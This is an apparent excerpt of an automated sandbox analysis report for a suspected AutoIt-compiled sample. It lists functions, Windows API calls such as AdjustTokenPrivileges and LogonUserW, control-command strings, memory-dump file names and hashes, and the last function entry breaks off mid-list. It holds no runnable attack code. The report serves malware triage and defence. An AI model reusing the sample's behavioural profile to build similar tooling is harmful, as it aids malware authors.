Instruction ID: ee1292a4b23fbcfb49e19a7789321ee64de74d021163498b0183dba15f5004f9
Opcode Fuzzy Hash: 828314e25f05694378d3a9be8e98c36853be3e300bf3a5635d11cd2b81f5651c
Instruction Fuzzy Hash: 74E0867159D7233DBA443519BC03EF7074E8F123357620207F810E51C1DD516C8225AD

Function 0068C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0068C6FB
FindClose.KERNEL32(00000000), ref: 0068C72B

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: d81f0684eaa7da961d0062bdd1e5a2f7f3701c72f29973704b21275a40e52698
Instruction ID: 8068ac7247e668a6181c6f30f4b11e9d4d91e5f980502d48ca1567f20c119147
Opcode Fuzzy Hash: d81f0684eaa7da961d0062bdd1e5a2f7f3701c72f29973704b21275a40e52698
Instruction Fuzzy Hash: 1411A1726006009FDB10EF29D845A6AF7EAFF85320F048A1DF8A9C7290DB34AC01CF95

Function 0068A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00699468,?,006AFB84,?), ref: 0068A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00699468,?,006AFB84,?), ref: 0068A0A9

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 19f84824898e9964ce11a25e310f8892f3b32a1ef4578ba5a3cbf8f79c549977
Instruction ID: f5ff519ee92c63b167c25aa6500bf4ef5dbc3eec0c7187a665eb4fe78ee0a4a0
Opcode Fuzzy Hash: 19f84824898e9964ce11a25e310f8892f3b32a1ef4578ba5a3cbf8f79c549977
Instruction Fuzzy Hash: B0F0E93510422DABDB10AFD4CC48FEA736EBF09361F004256FC04D6140C630A500CFE1

Function 006781CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00678309), ref: 006781E0
CloseHandle.KERNEL32(?,?,00678309), ref: 006781F2

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 261ae9f3321a2a91b771ec33cac410bd1760d555964dd78b4d4eb75510a0cdde
Instruction ID: 62815808077e595aa617472191200284d5214ba8792d51cd61b47b1295825711
Opcode Fuzzy Hash: 261ae9f3321a2a91b771ec33cac410bd1760d555964dd78b4d4eb75510a0cdde
Instruction Fuzzy Hash: AFE08C32010621AFFB212B61EC08DB3BBEBEF00310710882DF9A680430CB32ACA0DB10

Function 0064A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00648D57,?,?,?,00000001), ref: 0064A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0064A163

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b24af25b72076449e2fd8c1f451b728a956d4323268f5cacef8b6b492d247c47
Instruction ID: 5c85b47a9ca5b165b631710f4af02afe2340066ed290384afa5387285e4f0ed4
Opcode Fuzzy Hash: b24af25b72076449e2fd8c1f451b728a956d4323268f5cacef8b6b492d247c47
Instruction Fuzzy Hash: 6FB09231054208ABCF003BD1EC59B883F6AEB46AA2F405020F60D84060CFA264508ED2

Function 0064F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63008b15ba1aecddb184ce8883c4bf4e67c9e11081837e19bffc2b8bab8c42e6
Instruction ID: ddaef724272d092e47cd2b1426fe5def5c73f0ee84965b44d53b7c8008676c9f
Opcode Fuzzy Hash: 63008b15ba1aecddb184ce8883c4bf4e67c9e11081837e19bffc2b8bab8c42e6
Instruction Fuzzy Hash: 0D32E461D29F414DDB239A34D872336A24AAFB73C4F15E737E819B5EA6EB29C4C34100

Function 0065242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a6796f2c6ef5f5173263e5ef29dbede143c0688f7cb9bd0078eac47621ad5c4
Instruction ID: 280b5d0a0bf33eddfe433385776f787f10bdc3be5e72fefabc78cf23e0630212
Opcode Fuzzy Hash: 1a6796f2c6ef5f5173263e5ef29dbede143c0688f7cb9bd0078eac47621ad5c4
Instruction Fuzzy Hash: 1EB1BA70E2AF414DD32396398831336BA9DAFBB2C5F51E71BFC2670922EB2185C34141

Function 006787B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00678389), ref: 006787D1

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: a160111d4390295db2277937de674a0e445223d3a9b6d0c1fa73d2d122585ac6
Instruction ID: 47a9b81596f014605f68be65e8699609b4d55a97aa46cd00c40cc4b43bcce695
Opcode Fuzzy Hash: a160111d4390295db2277937de674a0e445223d3a9b6d0c1fa73d2d122585ac6
Instruction Fuzzy Hash: 73D05E322A050EABEF019FA4DC01EAE3B6AEB04B01F408111FE15C50A1C775E835AF60

Function 0064A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0064A12A

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6d16c002c506000ceb37ec727f433fe47e4454512ee7840c44290adaaff0518b
Instruction ID: e300dd6a5b13f515c8a84b0e758eabf73ea11fd834e5986c6950148cfd82a771
Opcode Fuzzy Hash: 6d16c002c506000ceb37ec727f433fe47e4454512ee7840c44290adaaff0518b
Instruction Fuzzy Hash: CDA0113000020CAB8F002B82EC08888BFAEEA022A0B008020F80C800228F32A8208AC2

Function 00638808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcd5a254887f47057ee6968f5f078f7e442e2c11c01491fab1cb9dd57a0ba2fb
Instruction ID: 246951586eaf2439ca79f15fb6dcb923c755483534b6ea7ad904e759a5e572b6
Opcode Fuzzy Hash: dcd5a254887f47057ee6968f5f078f7e442e2c11c01491fab1cb9dd57a0ba2fb
Instruction Fuzzy Hash: AA220530904746CFDF288A28C4947FC77A3BF41344F6884ABF55B8B692DBB59D92C681

Function 006421C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: ae4fe0fd873fa7a884c89b321d7d76871539e4cf40f3127c22826bfb6e533cae
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 69C187722051930ADF2D4639C4741BEFBA25EA37B136A176DE4B3CF2D4EE10C965D620

Function 006425FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: a168225eb0bd01bc25da4bf21ab147a38efa5dc0616a686ab970245bca2b674d
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 5DC196722051930ADF2D463AC4340BEFAA25FA37F136A176DE4B2DF2D4EE10C965D620

Function 00641978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: e12f5ce5b683bbb4b119713cd0ba5f0fb807521bcd671b2aff8a29280af4d232
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 59C193726451930ADF2D4639C4741BEBBA29EA37B131A176DD4B3CF2C4FE20C9A5D620

Function 016B0980 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1513112394.00000000016AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 37b29ccb38b6251af88c0d1e67e819acf993108506052c90bb32d0e3674d0d85
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 4241D271D1051CEBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 016B0870 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1513112394.00000000016AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 5e117b98a1a44f768d624c1e4c041fad8daa4141cf8b51a025635aada8cb1571
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 2D019674E01109EFCB44DF98C5909AEFBB5FF48310F208699E909A7301D731AE51DB80

Function 016B0810 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1513112394.00000000016AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 1358b33d38f47b14aa4df12cddf6734edbd298895477e9bdf7af5fa3b9ca2585
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 09019678E10109EFCB44DF98C5909AEFBB5FF48310F208599E919A7301D730AE41DB80

Function 016AF1A0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1513112394.00000000016AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00697806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0069785B
DeleteObject.GDI32(00000000), ref: 0069786D
DestroyWindow.USER32 ref: 0069787B
GetDesktopWindow.USER32 ref: 00697895
GetWindowRect.USER32(00000000), ref: 0069789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006979DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006979ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00697A35
GetClientRect.USER32(00000000,?), ref: 00697A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00697A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00697A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00697AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00697ABB
GlobalLock.KERNEL32(00000000), ref: 00697AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00697AD3
GlobalUnlock.KERNEL32(00000000), ref: 00697ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00697AE3
GlobalFree.KERNEL32(00000000), ref: 00697AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00697B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,006B2CAC,00000000), ref: 00697B16
GlobalFree.KERNEL32(00000000), ref: 00697B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00697B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00697B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00697B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00697D7A

Strings

, xrefs: 00697D00
AutoIt v3, xrefs: 00697A2D
static, xrefs: 00697A75, 00697BCC
DISPLAY, xrefs: 00697BDD

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: a99122380bb7ade863dad1ed9be223c8e73f7c1cc090568d6a8e7abca2cee441
Instruction ID: 3f3aaf713388bebf27b0631c62ba4601639174fa3da9266af77ba9bfecbc5e0e
Opcode Fuzzy Hash: a99122380bb7ade863dad1ed9be223c8e73f7c1cc090568d6a8e7abca2cee441
Instruction Fuzzy Hash: 16024871910215AFDB14EFA4DC89EAE7BBAEF49310F148168F915AB2A1C730AD41CF64

Function 006A356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,006AF910), ref: 006A3627
IsWindowVisible.USER32(?), ref: 006A364B

Strings

CURRENTTAB, xrefs: 006A36BD
ISVISIBLE, xrefs: 006A3637
GETCURRENTSELECTION, xrefs: 006A37E3
GETCURRENTLINE, xrefs: 006A38ED
SETCURRENTSELECTION, xrefs: 006A37B6
HIDEDROPDOWN, xrefs: 006A3700
GETLINE, xrefs: 006A399B
ISENABLED, xrefs: 006A366B
TABRIGHT, xrefs: 006A369D
FINDSTRING, xrefs: 006A3776
GETSELECTED, xrefs: 006A38A3
GETLINECOUNT, xrefs: 006A38C6
TABLEFT, xrefs: 006A3687
DELSTRING, xrefs: 006A3749
EDITPASTE, xrefs: 006A395F
ADDSTRING, xrefs: 006A3716
CHECK, xrefs: 006A386D
GETCURRENTCOL, xrefs: 006A3928
SENDCOMMANDID, xrefs: 006A39DA
SHOWDROPDOWN, xrefs: 006A36E0
ISCHECKED, xrefs: 006A3839
SELECTSTRING, xrefs: 006A3806
UNCHECK, xrefs: 006A3883

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 753f1bf444da7a78f7d3aa63ae113290c1ac9bb301457729750bd368bf2f77df
Instruction ID: cf38481ca74d5c298a172d8afb5864186752dbbb5a2fdb960d52075956ebd6e7
Opcode Fuzzy Hash: 753f1bf444da7a78f7d3aa63ae113290c1ac9bb301457729750bd368bf2f77df
Instruction Fuzzy Hash: 2CD16E302043219BDB44FF10C455AAE7BA3AF96344F14485DF98A5B3A2DB31EE4ACF95

Function 006AA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 006AA630
GetSysColorBrush.USER32(0000000F), ref: 006AA661
GetSysColor.USER32(0000000F), ref: 006AA66D
SetBkColor.GDI32(?,000000FF), ref: 006AA687
SelectObject.GDI32(?,00000000), ref: 006AA696
InflateRect.USER32(?,000000FF,000000FF), ref: 006AA6C1
GetSysColor.USER32(00000010), ref: 006AA6C9
CreateSolidBrush.GDI32(00000000), ref: 006AA6D0
FrameRect.USER32(?,?,00000000), ref: 006AA6DF
DeleteObject.GDI32(00000000), ref: 006AA6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 006AA731
FillRect.USER32(?,?,00000000), ref: 006AA763
GetWindowLongW.USER32(?,000000F0), ref: 006AA78E

Part of subcall function 006AA8CA: GetSysColor.USER32(00000012), ref: 006AA903
Part of subcall function 006AA8CA: SetTextColor.GDI32(?,?), ref: 006AA907
Part of subcall function 006AA8CA: GetSysColorBrush.USER32(0000000F), ref: 006AA91D
Part of subcall function 006AA8CA: GetSysColor.USER32(0000000F), ref: 006AA928
Part of subcall function 006AA8CA: GetSysColor.USER32(00000011), ref: 006AA945
Part of subcall function 006AA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 006AA953
Part of subcall function 006AA8CA: SelectObject.GDI32(?,00000000), ref: 006AA964
Part of subcall function 006AA8CA: SetBkColor.GDI32(?,00000000), ref: 006AA96D
Part of subcall function 006AA8CA: SelectObject.GDI32(?,?), ref: 006AA97A
Part of subcall function 006AA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 006AA999
Part of subcall function 006AA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006AA9B0
Part of subcall function 006AA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 006AA9C5
Part of subcall function 006AA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006AA9ED

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
